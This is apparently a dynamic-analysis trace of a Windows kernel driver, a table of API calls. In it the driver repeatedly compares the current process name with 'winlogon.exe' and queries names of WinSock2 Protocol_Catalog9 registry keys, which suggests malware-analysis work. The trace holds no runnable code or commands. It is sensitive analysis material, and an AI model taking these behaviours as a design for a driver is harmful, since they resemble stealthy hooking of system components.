| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x98, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x98, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fb7760, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x98, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fb7760, Length = 0x98, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a76e520 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbc, ret_val_ptr_out = 0xffffe0003a782cc0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0xbc, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a76e520 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbc, ret_val_ptr_out = 0xffffe0003a782cc0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0xbc, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a76e520 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbc, ret_val_ptr_out = 0xffffe0003a782cc0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0xbc, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a76e520 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba2d7cf0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbc, ret_val_ptr_out = 0xffffe0003a782cc0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba2d7cf0, Length = 0xbc, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b88746d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b88746d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
